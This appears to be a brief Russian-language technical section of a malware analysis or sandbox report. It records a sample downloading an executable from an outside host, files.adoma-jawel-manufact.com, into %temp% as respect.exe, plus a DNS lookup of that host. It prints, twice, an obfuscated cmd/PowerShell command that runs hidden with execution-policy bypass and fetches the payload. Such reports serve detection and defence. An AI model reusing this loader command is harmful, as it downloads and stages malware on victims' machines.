Техническая информация
- http://files.adoma-jawel-manufact.com/files/omgg.exe как %temp%\\respect.exe
- '<SYSTEM32>\cmd.exe' /c poWersHELL.eXe -WiNdOWStyle HiddEn -nOPROfiLE -ExeCUtiOnpOliCy ByPAsS (NeW-ObJecT SYsteM.NET.WeBCLiEnt).DOwnLOaDFile('http://files.adoma-jawel-manufact.com/files/OMGG.exe','%TEMP%\\Respect.e...
- DNS ASK fi###.###ma-jawel-manufact.com
- '<SYSTEM32>\cmd.exe' /c poWersHELL.eXe -WiNdOWStyle HiddEn -nOPROfiLE -ExeCUtiOnpOliCy ByPAsS (NeW-ObJecT SYsteM.NET.WeBCLiEnt).DOwnLOaDFile('http://files.adoma-jawel-manufact.com/files/OMGG.exe','%TEMP%\\Respect.e...' (со скрытым окном)